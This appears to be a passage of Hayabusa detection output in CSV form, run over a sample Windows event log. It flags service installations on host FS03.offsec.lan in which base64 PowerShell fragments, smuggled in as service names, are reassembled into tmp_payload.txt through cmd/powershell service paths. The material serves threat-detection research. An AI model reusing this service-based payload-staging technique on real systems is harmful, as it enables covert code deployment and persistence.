c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:36.391 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lmIG5vdCBhbHJlYWR5IGdhdGhlcmVkDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRGSUxFX09QVCkgew0KICAgICAgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg98"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:37.845 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAkT1MgPSAoR2V0LVdtaU9iamVjdCBXaW4zMl9PcGVyYXRpbmdTeXN0ZW0gLWNvbXB1dGVybmFtZS | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg99"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:39.282 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:39.282 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkKS5DYXB0aW9uDQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiJE9TIg0KICAgICAgICAgICAgfQ0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg100"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" 2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:40.731 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgDQogICAgICAgICAgICBpZiAoJENvbXB1dGVyTGlzdFR5cGUgLWVxICRMT0NBTEhPU1RfT1BUKSB7DQogICAgICAgICAgICAgICAgV3JpdGUtTG9nICRJTkZPX0xPRyAiR2V0dGluZyBPUyBJbm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg101"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:42.184 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm1hdGlvbiBmb3IgJENvbXB1dGVyIg0KICAgICAgICAgICAgICAgICRPUyA9IChHZXQtV21pT2JqZWN0IFdpbjMyX09wZXJhdGluZ1N5c3RlbSkuQ2FwdGlvbg0KICAgICAgICAgICAgICAgIFdy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg102"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:43.623 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: aXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgaWYgKCRDb21wdXRlckxpc3RUeXBlIC1lcSAkRE9NQUlOX09QVCkgew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg103"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service 
""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:45.063 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIkdldHRpbmcgT1MgSW5mb3JtYXRpb24gZm9yICRDb21wdXRlciINCiAgICAgICAgICAgICAgICAjJE9TID0gKEdldC1XbWlPYmplY3QgV2lu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg104"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:46.517 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MzJfT3BlcmF0aW5nU3lzdGVtIC1jb21wdXRlcm5hbWUgJENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCkuQ2FwdGlvbg0KDQogICAgICAgICAgICAgICAgJEdldEFEQ29tcHV0ZXJMaX | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg105"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:48.122 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: N0ID0gR2V0LUFEQ29tcHV0ZXIgLUNyZWRlbnRpYWwgJEdsb2JhbDpDcmVkIC1GaWx0ZXIge2VuYWJsZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IERO | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg106"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:49.575 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: U0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCg0KICAgICAgICAgICAgICAgICMkR2V0QURPUyA9IEdldC1BRENvbXB1dGVyIC1DcmVkZW50aWFsICRHbG9iYWw6Q3JlZCAtRmlsdGVyIHtlbmFibG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg107"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:51.015 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VkIC1lcSAidHJ1ZSJ9IC1Qcm9wZXJ0aWVzIE9wZXJhdGluZ1N5c3RlbSB8IFNlbGVjdCANCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAjJENvbXB1dGVyTGlzdCA9ICRHZXRBRENv | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg108"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:52.463 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bXB1dGVyTGlzdC5ETlNIb3N0TmFtZQ0KDQoNCiAgICAgICAgICAgICAgICAkT1MgPSAoJEdldEFEQ29tcHV0ZXJMaXN0IC1tYXRjaCAkQ29tcHV0ZXIpLk9wZXJhdGluZ1N5c3RlbQ0KICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg109"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
2021-11-03 17:17:53.917 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgIFdyaXRlLUxvZyAkSU5GT19MT0cgIiRPUyINCiAgICAgICAgICAgIH0gDQogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg110"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx"
